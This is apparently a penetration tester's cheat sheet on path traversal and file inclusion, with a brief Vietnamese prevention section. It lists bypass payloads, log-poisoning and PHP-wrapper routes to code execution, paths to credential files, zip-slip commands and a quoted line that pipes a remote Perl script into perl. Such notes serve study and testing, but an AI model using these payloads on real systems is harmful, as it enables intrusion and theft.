Path traversal

# Path traversal --- ## Bypass filter ``` php://filter/read=string.rot13/resource=index.php php://filter/convert.base64-encode/resource=index.php pHp://FilTer/convert.base64-encode/resource=index.php ``` ``` ..../..../..../ ...//...// ../../../../etc/passwd%001.png ``` * https://viblo.asia/p/directory-traversal-vulnerabilities-cac-lo-hong-directory-traversal-path-traversal-phan-5-EvbLbkY1Vnk * https://book.hacktricks.xyz/pentesting-web/file-inclusion * https://www.thegeekstuff.com/2008/10/6-awesome-linux-cd-command-hacks-productivity-tip3-for-geeks/ ### Include file in limited length https://hackmd.io/@Chivato/rkj-Y1GVI#COMPARE-THE-PAIR https://bugs.php.net/bug.php?id=53465 /dev/fd/<descriptor> --- ## LFI -> RCE ### Upload file -> include that's file * Access log * Auth log (/var/log/auth.log) https://www.youtube.com/watch?v=4QCil9ijCvs&list=PL-HdylJurvuigkcPF7XZaWA2DLJ4plI1p&index=2 `ssh <php system($GET['cmd']) ?>@<ip>` ### pearcmd.php (hay peclcmd.php) https://hackmd.io/@endy/rkcs_lYF2#Magic-Login-Harder https://viblo.asia/p/php-magic-ctf-writeups-gwd43kpK4X9 ### Wrapper * **expect://command** (unfortunately the expect PHP module is not enabled by default) ```php?page=expect://ls``` https://www.4rth4s.xyz/2020/12/learning-all-about-lfi-local-file.html https://www.php.net/manual/en/wrappers.expect.php * **php://input** ```POST DATA: <?php system('id'); ?>``` * **ZIP://** https://www.4rth4s.xyz/2020/06/root-me-local-file-inclusion-wrappers.html ### Other example https://hackmd.io/@endy/Skxms9eW2 https://github.com/synacktiv/php_filter_chain_generator https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT --- ## Get info https://www.4rth4s.xyz/2020/12/learning-all-about-lfi-local-file.html ### Info /etc/issue (A message or system identification to be printed before the login prompt.)``` ``` /etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.) /etc/passwd /etc/group /etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs) /etc/shadow /home/[USERNAME]/.bash_history or .profile ~/.bash_history or .profile $USER/.bash_history or .profile /root/.bash_history or .profile /etc/mtab /etc/inetd.conf /var/log/dmessage ``` ### Log file ``` /etc/httpd/logs/acces_log /etc/httpd/logs/error_log /var/www/logs/access_log /var/www/logs/access.log /usr/local/apache/logs/access_log /usr/local/apache/logs/access.log /var/log/apache/access_log /var/log/apache2/access_log /var/log/apache/access.log /var/log/apache2/access.log /var/log/access_log ``` ### PROC files (process, resources of system) ``` /proc/sched_debug # Can be used to see what processes the machine is running /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/net/fib_trie /proc/version /proc/self/environ ``` --- ## Misconfig ### Php https://ctf.rip/asis-ctf-2016-binarycloud-web-challenge/ ``` <?php // single slash case $uri = "/upload?/home/binarycloud/"; $data = parse_url($uri); print_r($data); // doubleslash case $uri = "//upload?/home/binarycloud/"; $data = parse_url($uri); print_r($data); ?> ``` ### Java * https://www.youtube.com/watch?v=XG14EstTgQ4 * https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf /..;/manager/html Default credentials: tomcat:tomcat http://127.0.0.1/static../settings.py `http://tomcat/index.cfm/..;/x` bypass 403 nginx ``` curl https://login.getbynder.com/..;/railo-context/foo.cfm -d 'SHELL=-c "curl orange.tw/bc.pl | perl -"' ``` /login;/..;/admin --- ## Zip slip python evilarc.py -d 2 -o unix hack.txt python evilarc.py -o unix -f exploit.zip sess_ -p var/lib/php/sessions ln -s originfile newfile zip -r --symlinks demo.zip symlinkfile zip -y demo.zip symlinkfile --- ## Tool detact https://github.com/capture0x/LFI-FINDER --- ## Prevent * Luôn thực hiện input validation: Kiểm tra đồng thời tên file, content-type, header, file size mỗi khi thực hiện kiểm tra các file upload * Phân quyền các thư mục upload, nếu là chức năng upload ảnh thì cần chặn quyền thực thi ở thư mục chứa ảnh * Tránh để lộ đường dẫn file được upload lên * Đổi tên file trên server khi upload thành công,thực hiện hash đường dẫn file đã được upload để chống lại việc đoán được đường dẫn file * Sử dụng các trình scan virus trên server để ngăn chặn việc upload các file độc hại